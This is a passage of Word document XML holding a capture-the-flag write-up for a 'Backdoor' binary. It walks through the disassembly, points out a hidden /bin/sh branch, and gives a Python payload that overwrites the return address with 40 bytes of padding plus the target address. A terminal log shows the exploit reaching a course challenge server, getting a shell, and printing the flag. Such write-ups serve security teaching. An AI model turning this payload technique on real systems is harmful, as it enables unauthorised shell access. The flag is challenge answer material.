          <w:iCs/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generated during decompilation.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="196597B8" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2A3C4EFF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>/* WARNING: Removing unreachable block (ram,0x004006bb) */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66AF49C7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>void get_time(void){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAE3986" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  system("/bin/date");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE1A88A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0B8E7A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="697A2690" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Get Time Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E264F69" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>get_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> assembly code reveals that the function has more to it than what is visible in the decompiled code. The line at </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x004006bb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is unreachable but useful.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="4A367149" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6EC1349A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Dump of assembler code for function get_time:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="050BE066" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x000000000040069d &lt;+0&gt;:     push   rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33AC64A0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x000000000040069e &lt;+1&gt;:     mov    rbp,rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="779D111C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006a1 &lt;+4&gt;:     push   rbx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA647D8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006a2 &lt;+5&gt;:     sub    rsp,0x18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091F203C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006a6 &lt;+9&gt;:     mov    ebx,0x4007c8                  = "/bin/date"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A244D74" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006ab &lt;+14&gt;:    mov    DWORD PTR [rbp-0x14],0xdead</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DBC22B3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006b2 &lt;+21&gt;:    cmp    DWORD PTR [rbp-0x14],0x1337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258BF26A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006b9 &lt;+28&gt;:    jne    0x4006c0 &lt;get_time+35&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04DF87A1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006bb &lt;+30&gt;:    mov    ebx,0x4007d2                    = "/bin/sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E62EB08" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006c0 &lt;+35&gt;:    mov    rdi,rbx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03DF4696" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006c3 &lt;+38&gt;:    mov    eax,0x0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A39035" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006c8 &lt;+43&gt;:    call   0x400550 &lt;system@plt&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DFFF12" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006cd &lt;+48&gt;:    add    rsp,0x18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544929C2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006d1 &lt;+52&gt;:    pop    rbx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D3D79D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006d2 &lt;+53&gt;:    pop    rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B03573B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006d3 &lt;+54&gt;:    ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25A4EB4B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Get Time Assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E353B1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After saving the command "</w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/bin/date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" in </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the program compares two different strings before performing a jump when they are not equal. If the jump did not occur, the operation at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x004006bb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would overwrite </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with "</w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t>," a command that would open a system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E9707" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">If an attacker can push </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x004006bb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the top of the stack, they can force the program to jump to that line when </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns. This would cause only the following portion of </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>get_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run, opening a shell.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="4305061E" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="18C4A656" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006bb &lt;+30&gt;:    mov    ebx,0x4007d2     = "/bin/sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2DECF6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006c0 &lt;+35&gt;:    mov    rdi,rbx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE86A4A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006c3 &lt;+38&gt;:    mov    eax,0x0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E427950" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006c8 &lt;+43&gt;:    call   0x400550 &lt;system@plt&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3734E980" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006cd &lt;+48&gt;:    add    rsp,0x18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03EE9B83" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006d1 &lt;+52&gt;:    pop    rbx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D0930E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006d2 &lt;+53&gt;:    pop    rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A66F35" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000000004006d3 &lt;+54&gt;:    ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32C879C7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>The Good Part of Get Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF488B4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">This attack might cause stack alignment issues because it forces the program to jump into the middle of the function instead of at the beginning, skipping stack pointer initialization. However, this technique already overwrites the stack pointer, </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t>, with payload data, so the stack data is already corrupted before this point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732D512E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The payload for this attack consists of 40 bytes of padding data followed by the address </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C56">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x004006bb</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4585"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="532C026A" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2C905237" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def pld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AECF3D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pad = b'A'*40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48512709" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addr = p64(0x00004006bb)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C534FDF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>return pad + addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A6585A2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C46BA0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Successful Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21618F73" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>After receiving the payload, backdoor prints the first 32 characters of input before its main method returns, and the program makes a system call to open a shell.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="331944D6" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="36C8FCB4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57935BA2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Backdoor_Pwn1.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2F3250" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Opening connection to offsec-chalbroker.osiris.cyber.nyu.edu on port 1339: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CAA0672" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C62605" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>You can't hack me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbb\x06@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39AD6928" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA7E71E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605A3D97" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00F9C5F1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>backdoor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092B5A3D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F3185AA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E1B63F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>flag{y0u_dont_n33d_t0_jump_t0_th3_b3ginning_of_functi0ns}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B729730" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Get Time Assembly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D018643" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E886A8C" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="001215EC" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc160920109"/>
      <w:bookmarkStart w:id="25" w:name="_School"/>
      <w:bookmarkStart w:id="26" w:name="_Toc161243443"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>School</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="226C24CC" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00530A29" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc160920110"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="24444B3D" w14:textId="77777777" w:rsidTr="008A799C">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29CC78D5" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="09DEE8BB" w14:textId="77777777" w:rsidTr="008A799C">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6B071E0D" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00DA733E" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>150 Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0B18D016" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
